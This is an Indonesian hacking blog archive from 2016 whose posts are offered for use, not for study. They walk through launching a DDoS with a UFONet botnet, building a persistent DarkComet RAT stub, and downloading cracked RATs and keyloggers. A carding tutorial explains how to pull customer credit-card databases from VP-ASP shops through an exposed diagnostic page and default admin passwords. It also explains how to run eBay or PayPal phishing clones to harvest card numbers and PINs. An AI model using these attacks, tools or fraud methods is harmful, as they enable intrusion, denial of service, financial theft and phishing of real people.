lagu

Sabtu, 26 November 2016

Cara Membuat Botnet Untuk D-Dos Attack Dengan UFONet (kali linux)

Ingat: alat ini tidak untuk tujuan pelatihan



Penggunaan UFONet untuk menyerang sasaran tanpa persetujuan bersama adalah tindakan ilegal.

UFONet - adalah perangkat lunak gratis yang dirancang untuk menguji serangan DDoS terhadap target menggunakan vektor 'Open Redirect' pada aplikasi web pihak ketiga seperti
Botnet

Features

  • Auto-update
  • Clean code (only needs python-pycurl)
  • Documentation with examples
  • Web/GUI Interface
  • Proxy to connect to ‘zombies’ (ex: tor)
  • Change HTTP Headers (User-Agent, Referer, Host…)
  • Configure requests (Timeout, Retries, Delay…)
  • Search for ‘zombies’ on google results (using a pattern or a list of dorks)
  • Test ‘Open Redirect’ vulnerabilities on ‘zombies’
  • Download/Upload ‘zombies’ from Community
  • Inspect a target (HTML objects sizes)
  • Set a place to ‘bit’ on a target (ex: big file)
  • Control number of rounds to attack
  • Apply cache evasion techniques
  • Supports GET/POST
  • Multithreading
  • Different search engines for dorking
  • Web interface
  • Geomapping / Visual data
  • Order ‘zombies’ to attack you for benchmarking
Pertama-tama download UFONet dari sourceforge link ini:
https://sourceforge.net/projects/ufonet/
ekstrak dan enter folder dan buka terminal dan sekarang lihat daftar pilihan yang tersedia dengan perintah ini ./ufonet --help

Sekarang kita harus men-download semua zombie yang akan digunakan untuk menyerang Open terminal dan ketik:
./ufonet --Download-zombie

Sekarang ketik perintah berikut untuk menggunakan versi GUI: ./ufonet --gui

Perintah di atas akan membuka browser dengan pilihan GUI .lalu Klik START mothership.
Dan akan membuka GUI dengan pilihan yang berbeda.

lalu klik botnet option

Mengklik pada Botnet akan memberikan banyak pilihan untuk mengkonfigurasi.

klik pada list zombie akan menampilkan semua list Zombies yang akan digunakan untuk menyerang.

Sekarang klik attack pilihan

Tetapkan URL dan IP target dan atur "number of rounds" sesuai kebutuhan Anda dan klik START untuk menyerang.

setelah anda klik start, beberapa zombie akan melakukan serangan dan beberapa saat kemudian host akan down :) regards

Jumat, 25 November 2016

DarkComet

DarkComet 5.3 versi dianggap versi yang paling stabil karena proyek ini tidak didukung lagi dan ada terlalu banyak program palsu yang sebagian besar berada di internet jadi kami pikir info ini cukup membantu anda.

 Jika kalian tahu sedikit tentang hal ini maka Anda harus tahu bahwa versi terbaru dari DC (Versi legacy) tidak memiliki "Build Server" option(!) Mengejutkan, bukan?
Mungkin untuk membuatnya Menjadi legal, Jadi kami memberikan Anda versi lama dari DC yang memiliki opsi (seperti seperti pada gambar di bawah) kami harap Anda tahu bagaimana mengaturnya.

 Catatan: Untuk menggunakan alat ini Anda harus menonaktifkan antivirus atau program keamanan lainnya, Antivirus akan mendeteksi karena itu adalah alat hacking
 Catatan: seperti yang kami bilang tadi bahwa banyak program palsu di internet maka kami tidak bisa menjamin keamanan tool ini dari malware.



Download DarkComet v5.3
https://mega.nz/#!3psCUZTA!GAgDTCiM2uzUqNPNFqtjP-kmplklHh2uB1gH9L03QuA 

DarkComet (versi legacy)
http://www.darkcomet-rat.com/






 


Centang kotak yang bertuliskan ' do not display again the EULA' yang terletak di bagian kiri bawah.
Klik 'I accept'

Di bagian kiri bawah, itu akan muncul sebuah Layar Bantuan, centang 'Do not show at startup' lalu klik 'Fine'



 klik DarkComet-RAT di pojok kiri atas.


klik 'Listen to new port (+Listen)‘

jendela baru akan terbuka, masukan port lalu centang 'Try to forward automaticaly (UPNP)‘

 Pindah ke 'Socket / Net' yang terletak di ujung perbatasan kiri atas.


 Pergi ke 'www.canyouseeme.org‘


Masukkan port
Jika semua berjalan dengan baik, seharusnya terlihat seperti ini:



Sekarang, klik DarkComet-RAT lagi dan klik Server Module, kemudian klik Full Editor (Expert)


Beri password apapun, lalu klik Mutex beberapa kali. 
kemudian Main Settings Main selesai
Pastikan Anda tidak mencentang FWB (Firewall Bypass)


Buka Pengaturan Jaringan.
Sekarang, pergi ke http://www.no-ip.com dan mendaftar DNS Gratis


Isikan list, Pastikan email tersebut valid karena karena itu dibutuhkan untuk memvalidasi email.
(Jika Anda tidak ingin memberikan email Anda,  Gunakan email di 10minutemail.com) lalu sign in



Sekarang, Anda akan melihat daftar pilihan, klik 'Add Host'



copy setingan:


Biarkan IP Address sebagai default alamat IP Anda.



klik Create Host.


Kembali ke DarkComet Anda dan masukan IP / DNS dan Port (DNS untuk NO-IP Anda buat nanti)


Kemudian klik 'Add' dan pergi ke Modul Startup.
Centang 'Start the stub with windows (modul startup)'
Kemudian biarkan semua kecuali 'Presistance Installation (always comeback)'
Centang itu.
Sekarang, seharusnya terlihat seperti ini:



Sekarang di akhir pergi ke 'Stub Finalization' di akhir.
Jika Anda akan mendapatkannya dienkripsi maka jangan centang UPX (Ultimate Packer Executable) saya akan meninggalkan itu dan hanya memilih no compression.



Sekarang centang 'Save the profil ketika rintisan berhasil dihasilkan' dan Membangun Stub. Sekarang ada satu hal terakhir.




Pergi ke Pengaturan Client di DarkComet-RAT dan kemudian klik NO-IP Updater



Kemudian dimasukkan ke dalam NO-IP host, Username dan Password, lalu centang 'Auto update your NO-IP DNS when your IP change'




Sekarang, jalankan stub yang dihasilkan dalam Sandbox untuk mengujinya.

Babylon RAT

https://mega.nz/#F!GwsD0SBS!T4WLr2iYKKhuEmnp530CUA

Hackforum thread:
http://hackforums.net/showthread.php?tid=5005561

Ozone RAT cracked version 0.55



Sebagian besar cracked tools adalah backdoor, itu sebabnya toolsnya gratis. Ini tidak terkecuali, dan ketika anda menjalankan executable untuk membuka Ozon, maka itu akan men-download file.
JgAJgPg.exe simpan ke folder% APPDATA% pada sistem Anda dan jalankan bersama dengan aplikasi utama.

Pastikan Anda melakukan ini pada mesin yang terisolasi atau VM dan selalu mematikan proses malware JgAJgPg.exe setiap saat.

https://mega.nz/#!HstU2CiI!yGQoE57f9D-PcLEWi4EAyz0OJ-70ohC42mKE7uXuw8M

Jrat 3.0

jRAT adalah alat Administrasi pengembang di Java sehingga dapat digunakan untuk semua platform (Win, Linux, Mac)

 "jika java terinstal pada mesin target"


https://mega.nz/#!ag1Q1TCb!S12FgZDHYF5y95ZWT1aeAdt-99D9bkeI_QiiZBfu9jE

file UFO (update)

Beberapa file ufo:
(tunggu update selanjutnya)



Kamis, 24 November 2016

tiny-ssh-tunnel

#!/bin/sh

 H1="+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"
H2="+ Tiny SSH Tunnel - Bash Script by Perforin [vxnetw0rk] +\n" H3="+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"

 if [ $# -gt 3 ];

then

 echo "script.sh PORT USER SERVER"
 exit
elif [ $# -eq 3 ] ;

then

echo "$H1$H2$H3"
ssh -ND $1 $2@$3

else

echo "Local Port: "
read LOCALPORT
 if [ $LOCALPORT -lt 1025 ]; then
echo "You need to be root to use this port!\n"
exit

fi

echo "Remote Server: "
read REMOTESERVER

echo "Remote User: "
read REMOTEUSER

clear

echo "$H1$H2$H3"
ssh -ND $LOCALPORT $REMOTEUSER@$REMOTESERVER

fi

Orcus RAT v1.3.1 cracked




https://mega.nz/#!2g9CgJrQ!a-KptwwCJE0i6GuPNp5xgGcpu_WIAAVU4cvAtLjSqbw

keylogger

Actual Keylogger v3.2
Actual SPY 3.0
Any Keylogger 2.30
Ardamax Keylogger 4.4
Award Keylogger Pro.3.8
Blazingtools Perfect Keylogger v1.7.5.0
Elite Keylogger V5
HawkEye Keylogger Cracked
iSafe All In One Keylogger Professional Edition 3.5.8
iSafe Monitoring Pro 7.0.0
iSpy keylogger
Keylogger Douglas 2.0
Perfect Keylogger 1.68
Refog keylogger Version 5
Revalation Keylogger v3.0
Revealer keylogger
Spy King Keylogger
Spy Tector keylogger Cracked
SpyBoss KeyLogger Pro 4.2.3
The Best Keylogger 3.54 Build 1000
The Best Keylogger 3.54 Build 1006
The Conquerers Keylogger
Spyrix Free Keylogger 6.7.0

Download keylogger disini: https://mega.nz/#!bsN3SYZL!YUWS39R2jbbRPcrLWW_g8zntHHS_IKoJmJwfKyoIP-E

droid jack 4.4 cracked




Download droidjack cracked disini
Untuk membeli http://droidjack.net/index.html

Senin, 21 November 2016

blackhat academy archive

The Repo has a semi-organized setup:
 * Previous classes are stored in the lolhackers folder.
Note: These classes are older and still pending review. They NEED to be taken with a grain of salt.


* These files are meant for EDUCATIONAL PURPOSES *ONLY*!!
* To view the class notes/logs, click on the class name and it will load in the browser.

kami akan mengirimkan file melalu email

Minggu, 20 November 2016

ROPInjector – Convert Shellcode and patch it into a given Portable Executable (PE)

https://github.com/gpoulios/ROPInjector

Sebuah alat yang ditulis dalam bahasa C (Win32) untuk mengkonversi shellcode apapun dalam ROP dan patch menjadi executable portabel yang diberikan (PE).
Ini hanya mendukung 32-bit target PEs dan instruksi set x86 . Diterbitkan di Blackhat USA 2015 “ROPInjector: Using Return Oriented Programming for Polymorphism and Antivirus Evasion”

Hosted Jaringan Starter - Wifi Hotspot Creator untuk Windows

HostedNetworkStarter adalah alat sederhana untuk Windows 7 yang memungkinkan Anda  dengan mudah membuat hotspot wifi dengan adaptor jaringan nirkabel Anda, menggunakan Wifi host dari sistem operasi Windows.
Dengan hotspot wifi yang dibuat oleh alat ini, Anda dapat mengizinkan perangkat lain yang support wifi untuk mengakses jaringan dan koneksi internet yang tersedia di komputer Anda.

http://www.nirsoft.net/utils/wifi_hotspot_starter.html

Clickjacking Exploiter



github Clickjacking, juga dikenal sebagai "UI redress attack", itu adalah ketika seorang attacker menggunakan beberapa lapisan buram atau transparan untuk mengelabui pengguna agar mengklik tombol atau link pada halaman lain ketika mereka berniat untuk mengklik halaman utama.
Dengan demikian, penyerang adalah "hijacking" klik disini maksudnya untuk halaman mereka dan routing mereka ke halaman lain.
Dengan kombinasi baik yang dibuat dari stylesheet, iframe, dan text boxes, pengguna dapat dituntun untuk mempercayainya dan mereka akan mereka mengetik password email atau account bank mereka, tapi sebenarnya mereka mengetik ke frame tak terlihat yang dikendalikan oleh penyerang.
Anda dapat menggunakan alat ini untuk menghasilkan P0C yang dinamis. >> OWASP

OnionIRC Archives



https://twitter.com/OnionIRC The Transkrip resmi dari pelajaran pertama diajarkan pada #OnionIRC ~ http://ix.io/xy1
TRANSKRIP PENUH | Pelajaran 2: introduction untuk bash http://ix.io/zq8
Full log of the OSINT lesson http://ix.io/ABl
Log dari class terakhir | Anonymous, Hacktivism & Pembangkangan Sipil. http://ix.io/Cme DNS Tunneling: http://ix.io/Er8 | SSH / Hidden service: http://ix.io/Er9
Log pelajaran dari # school4lulz | Sebuah studi kasus FBI http://ix.io/FCf PELAJARAN: Web App sum up + XSS (raw log): http://ix.io/OP6 seri pelajaran darknet http://ix.io/TcB

Z33nie – Hacking Tool untuk Windows

Last Release: Version 1.2.2
1/35 AV Detection FUD

Dengan beberapa fitur unik dan keren seperti Bypass UAC untuk setiap EXE dan Word Macro Eksploitasi !!

1 License = $10
Penggunaan software ini pada beberapa sistem menggunakan email berlisensi yang sama akan menyebabkan penangguhan lisensi Anda.

untuk menegtahui lebih lanjut http://z33nie.pw

Sabtu, 19 November 2016

Bitcoin Miners [Web Miner] [PHP Miner]

bitcoin miner

copy lalu pastekan link dibawah ini ke url bar anda

https://github.com/derjanb/hamiyoca
https://github.com/codler/Bitcoin-phpMiner

Open Source Bitcoin Mixer/Tumbler terintegrasi dengan wallet elektrum Anda !!

kami telah mencoba Bitcoin Fog, BitBlender dan Grams Helix tetapi mengirimkan uang Anda kepada seseorang untuk pencampuran selalu berisiko, dan Bitcoin Fog telah dilaporkan sebagai spam oleh banyak orang yang telah kehilangan uang mereka.

Jadi, kami mencari sebuah open source Bitcoins tumbler dan kami menemukan "Joinmarket" yang masih dalam pengembangan.
dan mereka melakukan pekerjaannya dengan sangat baik dalam membuat setiap orang untuk melakukan transaksi pribadi.

>>github link untuk joinmarket

>>dokumentasi teknis dari joinmarket

»Script untuk setup dan menggunakan JoinMarket pada TAILS OS

IRC: #joinmarket di irc.freenode.net https://webchat.freenode.net/?channels=%23joinmarket

Bitcointalk thread: https://bitcointalk.org/index.php?topic=919116.msg10096563

Subreddit: https://reddit.com/r/joinmarket

Twitter: https://twitter.com/joinmarket

Dan hal terbaik yang kami temukan tentang joinmarket ada plugin untuk elektrum wallet yang membuat pekerjaan jadi mudah dan sempurna seperti yang kami telah coba sebelum postingan ini.

https://github.com/AdamISZ/electrum-joinmarket-plugin

ikuti petunjuk di bawah ini:

  1. pip install libnacl
  2. git clone https://github.com/AdamISZ/joinmarket_core, maka sudo python setup.py lalu instal. Gunakan Electrum's Linux "easy"
    link instal: sudo pip install https://download.electrum.org/2.6.4/Electrum-2.6.4.tar.gz

    Bugfix: apply the patch https://github.com/spesmilo/electrum/commit/59d39108823989966e27a2f5df24c296cf2c1187
    untuk Electrum. edit source manual ini dibutuhkan pengguna ini diperlukan karena kita ingin melakukan pengujian rilis, tapi Electrum akan gagal untuk sign transaksi tanpa bugfix ini. Ini juga dapat dilakukan dengan mengedit secara manual
    /usr/local/lib/python2.7/dist-packages/electrum/wallet.py file and ganti txin = tx.inputs[i] menjadi txin = tx.inputs()[i].
  3. git clone https://github.com/AdamISZ/electrum-joinmarket-plugin.git repo (atau zip) dan secara manual copy joinmarket subdirektori ke dalam instalasi: sudo cp -r joinmarket /usr/local/lib/python2.7/ dist-paket / electrum_plugins /. (Ganti dengan apapun lokasi dist-paket untuk lingkungan Anda).
joinmarket

tutorial carding

Catatan: Hacking kartu kredit adalah tindakan ilegal, ini hanya postingan informasi dan saya tidak bertanggung jawab atas tindakan yang dilakukan oleh Anda setelah membaca tutorial ini. Postingan ini adalah untuk tujuan pendidikan saja. Mari kita mulai.

Apa kartu kredit Kartu kredit itu ada dua jenis?:

• Kartu Debit
• Kartu Kredit
1. Kartu debit adalah sebuah kartu pembayaran secara elektronik yang diterbitkan oleh Bank. Kartu ini dapat berfungsi sebagai pengganti pembayaran dengan uang tunai. Kartu ini mengacu pada saldo tabungan bank anda di bank penerbit tersebut.
2. Kartu kredit merupakan alat pembayaran pengganti uang tunai yang dapat digunakan oleh konsumen untuk ditukarkan dengan barang dan jasa yang diinginkannya di tempat-tempat yang dapat menerima pembayaran dengan menggunakan kartu kredit

Untuk menggunakan kartu kredit di internet kamu tidak hanya membutuhkan nomor cc dan masa kadaluwarsa tapi u perlu banyak info seperti:
• Nama depan
•nama keluarga
•Alamat
• Kota
• Negara
• Zip
• negara
• Telepon
• Nomor CC
• kadaluarsa
• CVV2 (ini adalah kode keamanan 3digit di bagian belakang setelah panel tanda tangan) Jika Anda mendapatkan CVV2. Anda dapat menggunakannya untuk membeli hal apapun di internet, seperti lisensi software, keanggotaan situs porno, keanggotaan proxy, atau layanan online biasanya, seperti webhosting, domain

Jika kamu ingin mendapatkan uang melalui hacking maka Anda membutuhkan keberuntungan ... Anda harus memiliki bank yang tepat dan tempat mencairkan kartu kredit melalui mesin ATM.
penjelasan
Pertama belajar beberapa hal sederhana.

BINS = 6 digit pertama dari setiap kartu kredit disebut "BIN" (misalnya nomor cc adalah: 4121638430101157 maka bin adalah "412163"), saya berharap ini mudah dimengerti.

Sekarang pertanyaannya adalah bagaimana mengambil uang melalui kartu kredit.? baik Anda tidak bisa melakukan itu, tapi ada orang-orang tertentu di dunia yang bisa melakukan itu. Mereka menyebut diri mereka "cashier". Anda dapat meluangkan beberapa waktu untuk menemukan cashier yang handal. Sekarang pertanyaannya adalah apakah setiap kartu kredit bank cashabke dan setiap bin adalah cashable? Seperti citibank, bank america, MBNA .. semua bank cashables? Yah jawabannya adalah "TIDAK". Jika kamu tahu beberapa hal, hal kecil tentang sistem perbankan, apakah kamu pernah mendengar apa itu mesin ATM? Di mana kamu menarik uangmu dengan memasukan kartumi di mesin ATM. setiap Bank tidak memiliki ATM, setiap bank tidak mendukung mesin ATM cashout. Hanya beberapa bank yang mendukung beberapa bin mereka (sebagaimana yang kamu tahu bin adalah 6 digit pertama dari nomor kartu kredit / debit), misalkan dari bank Amerika. bank yang tidak hanya memiliki 1 bin, bahwa bank ditugaskan seperti, 412345 412370 adalah bin kamu, kamu dapat membuat kartu kredit pada mereka. Sehingga bank membagi lokasi negara citi, seperti 412.345-412.360 adalah untuk Amerika, setelah itu bagi orang luar dan seperti ini. Saya harap kamu mengerti. Jadi semua bin dari bank yang sama bahkan tidak cashable, seperti untuk anggaplah mereka mendukung ATM di New York dan tidak di California, sehingga seperti bin dari California dari bank yang sama akan uncashable. Jadi selalu memastikan bahwa sampah dan bank adalah 100% cashable di pasar dengan banyak cashier

Pastikan cashier legit, karena banyak kasir yang ada yang mengambil kartu kredit Anda dan (ripping) Anda dan tidak mengirimkan share back 50% .kamu juga dapat menemukan beberapa cashier di mIRC * (/ server irc.unixirc.net:6667 ) channel: #cashout, #ccpower

Nah, periksa situs web di mana kamu memiliki daftar bin dan bank sebagian besar 101% cashable. Jika kamu mendapatkan kartu kredit dari bank yang sama dengan bin sama, maka kamu dapat cashout, sebaliknya tidak.
Ingat.. untuk menggunakan kartu kredit di internet kamu tidak perlu PIN (kata sandi yang kamu masuk dalam mesine ATM), tapi untuk cashout anda memerlukanya. Anda bisa mendapatkan pin hanya dengan 2 metode hacking. Metode pertama sql injeksi dan shopadmin hacking yang tidak memberikan pin, itu hanya memberikan cc CVV2 dan info lain yang biasanya perlu untuk belanja.

Credit Card Hacking

CC (Kartu Kredit) dapat diretas dengan dua cara:
•(scams) Penipuan Kartu Kredit (biasanya digunakan untuk mendapatkan uang, beberapa kali untuk belanja)
• Kartu Kredit Shopadmin Hacking (hanya untuk bersenang-senang, pengetahuan, belanja di internet)

1. Shopadmin Hacking
Metode ini digunakan untuk menguji pengetahuan atau untuk mendapatkan kartu kredit untuk berbelanja di internet, atau untuk bersenang-senang, atau dengan cara apapun tetapi tidak untuk menguangkan (karena metode ini tidak memberikan PIN digit kode akses) hanya memberikan cc, CVV2 dan info dasar lainnya.

Shopadmins adalah perusahaan yang berbeda, seperti: VP-ASP, X CART, dll
Tutorial ini untuk hacking VP-ASP SHOP.
Saya harap Anda melihat setiap kali Anda mencoba untuk membeli beberapa hal di internet dengan cc, mereka menampilkan bentuk baik diprogram, sangat aman, seperti xcarts vp-asp. situs tertentu tidak teretas, tapi carts teretas. Di bawah ini saya posting tutorial untuk hack VP ASP carts. Sekarang setiap situs yang menggunakan carts yang dapat diretas, dan melalui berkas * mdb mereka, Anda bisa mendapatkan rincian kartu kredit klien mereka, dan juga nama login dan password dari admin area mereka, dan semua info lainnya dari klien dan rahasia comapny.

lets start:
jenis: VP-ASP Shopping CartVersion: 5.00 Bagaimana menemukan situs VP-ASP 5,00 ? Menemukan VP-ASP 5,00 situs sangat sederhana ...

1. Pergi ke google.com dan ketik: VP-ASP Shopping Cart 5,00
2. Anda akan menemukan banyak situs dengan VP-ASP 5.00 keranjang perangkat lunak yang diinstal

Sekarang mari kita eksploitasi ..
Halaman ini akan menjadi seperti ini: http: //www. target .com/shop/shopdisplaycategories.asp mengeksploitasinya adalah: diag_dbtest.asp sekarang lakukan ini: http:// www. target .com/shop/diag_dbtest.asp

Sebuah halaman akan muncul berisi:
• xdatabase
• shopping140
• xDblocation
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber
Example:
Yang paling penting di sini adalah xDatabasexDatabase: shopping140 Ok, sekarang URL akan seperti ini: http: //www.victim .com/shop/shopping140.mdb

Jika Anda tidak men-download Database, coba ini sementara ada dblocation: xDblocationresx url akan: http: //www.target.com/shop/resx/shopping140.mdb

Download file mdb dan Anda harus dapat membukanya dengan file mdb viewer, Anda harus dapat menemukan di Download.com, atau menggunakan MS Office Access. Di dalamnya Anda harus dapat menemukan informasi kartu kredit, dan Anda bahkan harus dapat menemukan username dan password admin untuk website.

Halaman login admin biasanya terletak di sini: http: //www.target.com/shop/shopadmin.asp

Jika Anda tidak dapat menemukan username dan password admin di file mdb atau Anda dapat menemukanya tapi itu salah, atau Anda tidak dapat menemukan file mdb sama sekali,
cobalah untuk menemukan halaman login admin dan masukkan password default yaitu:
Username: admin password: admin
atau Username: vpasp password: vpasp


2 Hacking Melalui scams
Metode ini biasanya digunakan untuk mendapatkan uang. Apa yang terjadi dalam metode ini adalah Anda membuat halaman clone.
Target: pada dasarnya eBay.com atau paypal.com untuk kartu kredit umum, atau jika u ingin menargetkan bank cashable tertentu seperti bankswasta.com maka kamu harus membuat halaman klon untuk bank itu.
Apa eBay.com?
situs belanja dunia yang digunakan oleh milyaran orang yang menggunakan kartu kredit mereka di ebay. Apa yang harus Anda lakukan adalah membuat halaman yang sama seperti eBay dan meng-upload di beberapa hosting yang tidak memiliki batasan hukum, cobalah untuk menemukan hosting Eropa mereka akan membuat penipuan Anda bertahan untuk waktu yang lama
dan untuk email pengguna eBay.
Bagaimana cara mendapatkan email dari penggunanya?
Pergi ke google.com dan ketik "Email Harvestor" atau Email Spider lain dan mencari pembeli eBay dan Penjual eBay dan kamu akan mendapatkan daftar panjang. daftar yang tidak akurat tetapi dari 1000 minimal 1 email akan berlaku. mungkin Anda akan membutuhkan beberapa waktu.
Setelah Anda membuat halaman tiruan dari ebay, kirimi email ke daftar yang Anda buat dari Spider dengan pesan seperti:
"Your Account has been hack" atau alasan apapun yang terlihat profesional, dan meminta mereka untuk mengunjungi link di bawahnya dan memasukkan info penagihan, dan halaman penipuan anda harus memiliki program ketika mereka memasukkan info mereka, maka infonnya datang langsung ke email anda. di halaman anda juga harus ada pengisian formulir PIN yang diperlukan sehingga anda juga mendapatkan nomor PIN dimana anda bisa mendapatkan uang tunai ..
Sekarang jika Anda menjalankan ebay scam atau paypal scam, itu terserah Anda siapa korbannya. Seorang klien dari bank negara atau citibank atau bank daerah, hanya butuh keberuntungan, mungkin Anda mendapatkan cashable mungkin Anda tidak, semua tergantung keberuntungan tidak ada yang lain.
Cari di google untuk men-download situs scam dan mempelajarinya!
Setelah Anda membuat situs penipuan Anda, hanya menemukan beberapa Harvestor email atau Spider dari internet (download satu yang baik di Bulk Email Software Superstore - Email Marketing Internet Advertising) dan buat daftar email yang baik.
Dan Anda perlu menemukan mailer (pengirim mailer massal) yang mengirim email ke semua email dengan pesan memperbarui akun mereka di laman scam anda). Dalam from to:, gunakan email seperti eBay@reply3.ebay.com dan di subject use : eBay - Update Your eBay Account
dan in Name gunakan eBay
Beberapa Petunjuk:

  1. Pastikan hosting Anda tetap up atau link dalam email yang anda kirimkan ketika dibuka korban, ia akan menampilkan "page not found", dan rencana Anda akan gagal.
  2. titik paling sulit adalah untuk menemukan hosting yang tetap up di scam. bahkan kami tidak bisa menemukannya dengan mudah, ini adalah bagian yang sangat sangat sulit.
  3. Mungkin Anda memiliki kontak dengan seseorang yang memiliki own hosting dan co location yang dapat ia gunakan menyembunyikan scam Anda di beberapa dedicated tanpa pembatasan.
  4. Menemukan daftar email yang baik (baik maksudnya = pengguna yang asli)
  5. software mailing massal anda harus terkirim di inbox pengguna, bukan kotak spam

Saya Harap tutorial ini berguna. Dan ingat, hacking kartu kredit adalah tindakan ilegal, ini hanya postingan informasi dan saya tidak bertanggung jawab atas tindakan yang Anda lakukan setelah membaca tutorial ini.
regards

Jumat, 18 November 2016

Daftar sumber belajar


  1. Sebagian besar tutorial dan kursus ini melayani tujuan baik hacking atau memberikan Anda keterampilan dasar yang Anda perlukan untuk hacking, jadi saya pikir ini akan menjadi tempat terbaik untuk mengeposkan. Jika tidak, saya minta maaf dan saya akan menghapusnya jika perlu.

Ini adalah daftar pribadi sumber belajar.

penambahan terbaru:
1.https://g.sicp.me/books/
2.http://canyouhack.us/
3.http://www.learnerstv.com/Free-Computer-Science-Video-lectures-ltv578-Page1.htm
4.http://www.securitytube.net/


Kursus dan tutorial:
  1. https://github.com/open-source-society/computer-science
  2. http://www.buildyourownlisp.com/
  3. https://www.cybrary.it/
  4. https://learn.saylor.org/course/index.php?categoryid=9
  5. https://www.freecodecamp.com/
  6. https://pentesterlab.com/
  7. https://www.offensive-security.com/metasploit-unleashed/requirements/
  8. http://opensecuritytraining.info/Training.html
  9. https://trailofbits.github.io/ctf/
  10. https://github.com/prakhar1989/awesome-courses
  11. http://halls-of-valhalla.org/beta/challenges
  12. https://hack.me/
  13. https://exploit-exercises.com/
  14. http://hsctf.com/
  15. https://hackr.io/
  16. http://www.theodinproject.com/
  17. http://practicalcryptography.com/
  18. https://www.sololearn.com/
  19. http://www.learnerstv.com/Free-Computer-Science-Video-lectures-ltv578-Page1.htm
  20. http://www.securitytube.net/


project open source
  1. https://openhatch.org/
  2. https://www.codetriage.com/
  3. http://www.firsttimersonly.com/
  4. http://up-for-grabs.net/#/



Tantangan dan latihan:
  1. http://skullcode.com/
  2. https://projecteuler.net/
  3. https://www.codeeval.com/
  4. https://www.codechef.com/
  5. https://www.hackerrank.com/
  6. https://www.hackerearth.com/
  7. https://codefights.com/
  8. https://ctf.csaw.io/
  9. http://www.pythonchallenge.com/
  10. http://www.codewars.com/
  11. https://www.starfighters.io/
  12. https://www.hackthissite.org/
  13. http://hack.darkn3ss.com/
  14. http://roothack.org/
  15. http://reversing.kr/
  16. https://w3challs.com/
  17. http://pwnable.kr/
  18. https://www.codingame.com/start
  19. http://canyouhack.us/



Publikasi Akademik: mesin pencari
  1. https://arxiv.org/
  2. http://porto.polito.it/
  3. http://sunsite.informatik.rwth-aachen.de/Publications/AIB/
  4. https://web.cs.umass.edu/publication/
  5. http://ieeexplore.ieee.org/Xplore/home.jsp



Publikasi Akademik: koleksi
  1. http://paperswelove.org/
  2. http://fermatslibrary.com/



books
  1. http://www.intechopen.com/books/subject/computer-and-information-science
  2. http://bookzz.org/
  3. http://it-ebooks.info/
  4. http://www.allitebooks.com/
  5. http://booksc.org/
  6. https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md
  7. http://golibgen.io/
  8. https://g.sicp.me/books/



Misc:
  1. http://www.phrack.org/
  2. https://github.com/jwasham/google-interview-university

WELCOME


 

we are anonymous minor squad.. we come to help


hacktivis

general


Kami menganggap alat berikut sebagai dasar yang harus dimiliki dan harus digunakan untuk semua hacktivists yang ingin berpartisipasi dalam tindakan langsung digital.


Tor: The Onion Router jaringan


Tor adalah perangkat lunak dari https://torproject.org ke anonim lalu lintas web antar komputer. hubungkan komputer Anda ke jaringan Tor melalui proxy lokal TCP (SOCKS4 / 5) yang dapat digunakan untuk lebih dari sekedar browsing web - aplikasi (seperti kebanyakan Instant klien Messaging) yang mampu menggunakan proxy dapat mengarahkan lalu lintas lebih jaringan Tor dan membiarkan Anda menggunakan layanan anonymously.

Anda bahkan dapat torify banyak aplikasi seperti ssh, rsync dan banyak lagi dengan menggunakan "tsocks" atau "tsocks" script termasuk dalam paket Tor yang lain!

Kami juga menyarankan Anda menambahkan entri DNSPort ke file torrc lokal Anda (/ etc / tor / torrc pada kebanyakan sistem Linux) dan menggunakan Tor-built-in server DNS untuk menyelesaikan nama lokal. Pastikan Anda juga memodifikasi / etc / resolv, pengaturan conf Anda hanya menggunakan nameserver lokal untuk DNS. (Bagaimana melakukan itu pada platform lain?). Hal ini untuk mencegah kebocoran dari alamat IP Anda di internet karena resolusi DNS sehingga terlindungi.

Tails: The Amnesic Incognito Live System


tails selesai berbasis Linux (Debian) sistem dari https://tails.boum.org. Hal ini dapat boot langsung dari USB stick dan karena itu dapat digunakan dengan PC yang mampu booting dari media USB (sebagian besar BIOS dibiarkan masuk ke menu boot dengan menekan F12; memeriksa dengan hardware Anda)


GnuPG: The GNU Privacy Guard


GnuPG adalah sebuah implementasi open-source dari standar OpenPGP; dapat ditemukan di http://gnupg.org Hal ini terutama digunakan untuk enkripsi email (meskipun Anda dapat menggunakannya untuk en- dan mendekripsi file polos dengan baik cipher simetris atau asimetris juga) dan memiliki integrasi yang baik ke banyak klien email (MUA) pada platform yang berbeda (seperti Enigmail untuk mail client Thunderbird).


OTR: Off-the-record messaging


OTR adalah protokol komunikasi untuk Instant Messaging dari http://www.cypherpunks.ca/otr/. Saat ini hanya didukung untuk sesi XMPP (seperti Jabber), tapi banyak klien IM untuk protokol yang menggunakan plugin OTR (seperti pidgin atau gaim). Hal ini sangat mudah digunakan dan memberikan kerahasiaan yang sempurna untuk pertukaran pesan IM.


POND


Pond adalah protokol pesan baru (dan eksperimental) yang menggabungkan keuntungan dari GnuPG (asynchronous message exchange) dan OTR (perfect forward secrecy) dan juga menyediakan bahkan deniability masuk akal untuk komunikasi untuk kedua rekan-rekan.

    Kami menganggap pond sebagai pendekatan yang menjanjikan untuk masalah pemberian hacktivists cara yang aman untuk berkomunikasi secara pribadi dan anonim melalui internet dan akan membuatnya sebagai cara yang lebih disukai di masa depan (segera setelah pembangunan telah mencapai di Status setidaknya beta) .
Situs ini telah menjalankan server percobaan pond, jadi jika Anda mengatur untuk mengkompilasi klien untuk platform Anda, jangan ragu untuk menguji itu ...


Zodiac: USB Live System


Kami menggunakan self-made Live USB Linux (berbasis Debian / 7.0 Wheezy) disebut Zodiac untuk pekerjaan kami dan tindakan langsung digital. Anda mungkin ingin melakukan hal yang sama...
cara instal » disini
download script » DISINI


scanner kerentanan / Eksploitasi kerangka kerja untuk web graffiti


Seperti kebanyakan, memanfaatkan kerangka kerja membutuhkan beberapa keterampilan dan pengetahuan tambahan untuk digunakan secara efektif, kami di sini memberikan daftar link dan tutorial tentang bagaimana menggunakan setiap kerangka. Informasi tambahan tentang "Peraturan Keselamatan" yang diberikan bila memungkinkan.


Nmap


Salah satu yang tertua - salah satu yang terbaik! Masih alat yang penting untuk port scanning, OS fingerprinting dan deteksi layanan ...



Medusa


Brute force jaringan paralel masuk auditor
(word list)


w3af


Web Application Attack and Audit Framework ( Aplikasi Web Attack dan Kerangka Audit)


metasploit


overview tutorials


nessus


overview

Tutorials


